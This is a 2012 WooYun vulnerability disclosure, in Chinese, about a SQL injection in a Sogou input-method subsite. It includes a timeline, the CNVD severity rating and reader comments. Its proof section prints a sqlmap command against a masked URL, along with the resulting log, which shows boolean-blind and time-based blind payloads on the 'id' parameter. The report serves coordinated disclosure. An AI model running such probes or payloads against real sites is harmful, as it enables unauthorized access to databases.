搜狗某分站注入

漏洞概要

缺陷编号:WooYun-2012-05719

漏洞标题:搜狗某分站注入

相关厂商:搜狗

漏洞作者:Nu11

提交时间:2012-04-04 08:04

公开时间:2012-05-17 08:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2012-04-04: 细节已通知厂商并且等待厂商处理中
2012-04-06: 厂商已经确认,细节仅向厂商公开
2012-04-16: 细节向核心白帽子及相关领域专家公开
2012-04-26: 细节向普通白帽子公开
2012-05-06: 细节向实习白帽子公开
2012-05-17: 细节向公众公开

简要描述:

注入漏洞

详细说明:

搜狗分站存在注入,可能导致泄露数据库资料。

漏洞证明:

[email protected]:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://**.**.**.**/skins/xl.php?id=55"sqlmap/0.9 - automatic SQL injection and database takeover toolhttp://**.**.**.**[*] starting at: 07:33:43[07:33:44] [INFO] using '/pentest/web/scanners/sqlmap/output/**.**.**.**/session' as session file[07:33:44] [INFO] testing connection to the target url[07:33:46] [INFO] testing if the url is stable, wait a few seconds[07:33:47] [INFO] url is stable[07:33:47] [INFO] testing if GET parameter 'id' is dynamic[07:33:48] [INFO] confirming that GET parameter 'id' is dynamic[07:33:49] [INFO] GET parameter 'id' is dynamic[07:33:51] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable[07:33:51] [INFO] testing sql injection on GET parameter 'id'[07:33:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[07:33:56] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable[07:33:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[07:33:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[07:33:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[07:33:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[07:33:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'[07:34:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[07:34:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[07:34:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[07:35:02] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable[07:35:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[07:35:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'yET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]sqlmap identified the following injection points with a total of 34 HTTP(s) requests:---Place: GETParameter: idType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=55 AND 9272=9272Type: AND/OR time-based blindTitle: MySQL > 5.0.11 AND time-based blindPayload: id=55 AND SLEEP(5)---[07:36:11] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.1.6back-end DBMS: MySQL 5.0.11[07:36:11] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/**.**.**.**'[*] shutting down at: 07:36:11

修复方案:

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2012-04-06 16:40

厂商回复:

CNVD确认注入点,复现相关过程。此前与搜狗安全小组有过联系,将直接协调对方处理。站点为涉事单位输入法子站,就影响危害而言只涉及单个子站,未进行其他测试。对该漏洞评分如下:
CVSS评分:(AV:R/AC:L/Au:NR/C:P/A:N/I:N/B:N) Score:4.96(最高10分,中危)
即:远程攻击、攻击难度低、不需要用户认证,对机密性造成部分影响,不影响完整性和可用性。技术难度系数:1.0(一般)
影响危害系数:1.1(一般,子站系统)综合评分:4.96*1.0*1.1=5.456

最新状态:

暂无

评价

  1. 2010-01-01 00:00 shine 白帽子 | Rank:710 漏洞数:75)

    搜狗的问题,怎么交给CNVD处理了?

  2. 2010-01-01 00:00 shine 白帽子 | Rank:710 漏洞数:75)

    哦!知道了!

  3. 2010-01-01 00:00 horseluke 白帽子 | Rank:108 漏洞数:18)

    @shine 不明白,看不出为啥要给CNCERT....

  4. 2010-01-01 00:00 shine 白帽子 | Rank:710 漏洞数:75)

    @horseluke 无非以下几种可能性:

    1、搜狗对漏洞的“已忽略”率太高了,xsser与该厂商已无法沟通(可能这洞里面有些问题,@xsser处理类似事件周全考虑的结果(@xsser的应急战略解决方案)),就只能给CNCERT(CNCERT才是最大的厂商负责部门(即国家));

    2、搜狗与CNCERT有一腿;

    [email protected](这个基本不可能,因为即使乌龙了也是可以改回来的!)

    猜测别人的心思是不礼貌的!@xsser勿怪!哈哈!